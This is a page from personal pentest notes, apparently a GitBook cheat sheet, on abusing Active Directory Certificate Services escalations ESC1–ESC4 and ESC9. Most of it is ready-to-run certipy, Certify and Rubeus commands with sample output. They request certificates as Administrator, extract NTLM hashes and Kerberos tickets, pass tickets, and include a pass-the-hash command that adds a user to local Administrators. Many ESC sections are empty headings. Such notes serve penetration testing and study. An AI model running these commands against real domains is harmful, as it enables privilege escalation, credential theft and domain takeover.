Dado1513
  • Dado1513 Pentest Notes
  • Introduction & Documentation
  • Pentesting Methodologies
  • External Recon Pentesting
  • Brute Force
  • LotL - Living off the Land
  • Pivoting Tunnelling and Port Forward
  • Active Directory
    • 🛠️Active Directory Enumeration & Attacks
    • 🛠️ACL/ACE Abuse
    • 🛠️ADCS
    • Kerberos Attack Cheatsheet
    • 🛠️Trust Attacks
  • Linux Pentesting
    • Linux Privilege Escalation
  • Windows Pentesting
    • Windows Privilege Escalation
  • Mobile Pentesting
    • 🛠️Android Application Pentesting
    • 🛠️iOS Application Pentesting
  • Cloud Pentest
    • 🛠️Cloud Pentesting
  • Wireless Pentesting
    • 🛠️WiFi Pentesting
  • Web Pentesting
    • 🛠️XSS Cheatsheet
    • 🛠️SQL Injection
  • OSINT
    • Google Dorks
  • Network Services Pentest
    • Attacking Common Services
    • 🛠️139,445 SMB
    • 🛠️161,162,10161,10162- Pentesting SNMP
    • 🛠️winrm
  • Tools
    • NetExec
    • chisel
    • bloodyAD
    • PowerView
    • certipy
    • sqlmap
    • mimikatz
    • mSFVenom Cheatsheet
    • Ligolo-ng
    • Rubeus
    • ldapsearch
Powered by GitBook
On this page
  • ADCS
  • Info
  • ESC1 - template-allows-san
  • ESC2 - variation of ESC1
  • ESC3 - Misconfigured Enrollment Agent Templates
  • ESC4 - certificate-templates
  • ESC5
  • ESC6
  • ESC7
  • ESC8
  • ESC9 - no-security-extension
  • ESC10
  • ESC11
  • ESC12
  • ESC13
  • ESC14
  • ESC15
  • Risorse
  1. Active Directory

ADCS

Abusing Active Directory Certificate Services (ADCS)

ADCS

Info

Search CA

  • Search if CA is used

┌──(kali㉿kali)-[~/…/machines/lab/certified-medium/certify]
└─$ netexec ldap domain_controlled -d domain.local  -u 'user' -p 'password' -M adcs

SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:domain.loca) (signing:True) (SMBv1:False)
LDAP        10.10.11.41     389    DC01             [+] domain.local\user:password 
ADCS        10.10.11.41     389    DC01             [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.10.11.41     389    DC01             Found PKI Enrollment Server: DC01.domain.local
ADCS        10.10.11.41     389    DC01             Found CN: certified-DC01-CA

  • Search vulnerability

certify.exe find /vulnerable
certipy find -u 'user' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce'  -dc-ip 10.10.11.51   
certipy find -u '[email protected]' -p <password> -dc-ip <DC_IP> -vulnerable -enabled

Extracting ccache

certipy auth -pfx administrator.pfx -username administrator -domain lab.local -dc-ip 10.129.205.199

Extracting nthash

certipy auth -pfx administrator.pfx -domain domain.local

Convert Certificate obtained from Windows

PS C:\Tools> & "C:\Program Files\OpenSSL-Win64\bin\openssl.exe" pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" - export -out cert.pfx

Authenticate in windows

PS C:\Tools> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /nowrap

Certificate Authentication and extract NTLM

PS C:\Tools> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /nowrap

Create a Sacrificial Logon Session with Rubeus

PS C:\Tools> .\Rubeus.exe createnetonly /program:powershell.exe /show

Import Base64 Ticketin into the Powershell session using Rubeus

PS C:\Tools> .\Rubeus.exe ptt /ticket:doIGQjCCBj6gAwIBBaEDAgEW<SNIP>

ESC1 - template-allows-san

The primary misconfiguration behind this domain escalation scenario lies in the possibility of specifying an alternate user in the certificate request. This means that if a certificate template allows including a subjectAltName ( SAN ) different from the user making the certificate request (CSR), it would allow us to request a certificate as any user in the domain
 

  • find

certipy find -u '[email protected]' -p <password> -dc-ip <DC_IP> -vulnerable -stdout

  • abuse

certipy-ad req -u user -target target.local -upn [email protected] -ca hostname_ca -template vulnerable_template -hashes NTLM_HASH -key-size 4096  -dns 10.10.11.51 -dc-ip 10.10.11.51

certipy req -u '[email protected]' -p 'Password123!' -dc-ip 10.129.205.199 -ca lab-LAB-DC-CA -template ESC1 -upn Administrator

  • From Windows

.\Certify.exe request /ca:caName /template:vulnerableTemplateName /altname:[target]

ESC2 - variation of ESC1

ESC2 ( Escalation 2 ) is a variation of ESC1. When a certificate template specifies the Any Purpose Extended Key Usage (EKU) or does not identify any Extended Key Usage, the certificate can be used for any purpose (client authentication, server authentication, code signing, etc.)

certipy req -u '[email protected]' -p 'Password123!' -ca lab-LAB-DC-CA - template ESC2 -upn Administrator
Note: It is possible to omit the -dc-ip "IP DC" command if the attacking computer can resolve the domain name
PS C:\Tools> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force 
PS C:\Tools> cd .\Invoke-TheHash\;Import-Module .\Invoke-TheHash.psm1

PS C:\Tools> Invoke-TheHash -Type SMBExec -Target localhost -Username Administrator -Hash 2b576acbe6bcfda7294d6bd18041b8fe -Command "net localgroup Administrators grace /add"

ESC3 - Misconfigured Enrollment Agent Templates

Involves exploiting a different Extended Key Usage (EKU) and necessitates an additional step to carry out the abuse.

The term Extended Key Usage is sometimes used as Enhanced Key Usage by Microsoft documentation, but section 4.2.1.12 of RFC 5280 defines the correct name as Extended Key Usage 
certipy req -u '[email protected]' -p 'Password123!' -ca 'lab-LAB-DC-CA' - template 'ESC3'

certipy req -u '[email protected]' -p 'Password123!' -ca lab-LAB-DC-CA - template 'User' -on-behalf-of 'lab\administrator' -pfx blwasp.pfx

ESC4 - certificate-templates

certipy template -username [email protected]  -hashes NTLM_HASH  -template Vulnerable_template  -save-old

ESC5

ESC6

ESC7

ESC8

ESC9 - no-security-extension

If the certificate attribute msPKI-Enrollment-Flag contains the flag CT_FLAG_NO_SECURITY_EXTENSION, the szOID_NTDS_CA_SECURITY_EXT extension will not be embedded, meaning that even with StrongCertificateBindingEnforcement set to 1, the mapping will be performed similarly as a value of 0 in the registry key.

Here are the requirements to perform ESC9:

  • StrongCertificateBindingEnforcement not set to 2 (default: 1) or CertificateMappingMethods contains UPN flag (0x4)

  • The template contains the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value

  • The template specifies client authentication

  • GenericWrite right against any account A/1 to compromise any account B/2

  • Update upn user2

certipy account update -username "[email protected]" -hashes "a091c1832bcdd4677c28b5a6a1295584" -user "user2" -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'user2':
    userPrincipalName                   : Administrator
[*] Successfully updated 'user2'

  • Get pfx

certipy req -username "user2" -p "12345678" -target "10.10.11.41" -ca 'CA_NAME' -template 'TemplateName'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

  • Extracting NTHASH

certipy auth -pfx administrator.pfx -domain domain.local

ESC10

ESC11

ESC12

ESC13

ESC14

ESC15

Risorse

  • https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-1-799f3d3b03cf

  • https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-2-ac7f925d1547

  • https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-3-33efb00856ac

  • https://www.thehacker.recipes/ad/movement/adcs/

  • https://posts.specterops.io/certified-pre-owned-d95910965cd2

  • https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-misconfigured-certificate-template-to-domain-admin

  • https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-one/

PreviousACL/ACE AbuseNextKerberos Attack Cheatsheet

Last updated 1 day ago

is when a certificate template permits Client Authentication and allows the enrollee to supply an arbitrary Subject Alternative Name (SAN). Request a certificate based on the vulnerable certificate template and specify an arbitrary UPN.

is when a user has write privileges over a certificate template. This can for instance be abused to overwrite the configuration of the certificate template to make the template vulnerable to ESC1. We need to know the DNS name and the Template Name

To understand this privilege escalation, it is recommended to know how certificate mapping is performed. It is presented in .

🛠️
ESC1
ESC4
this section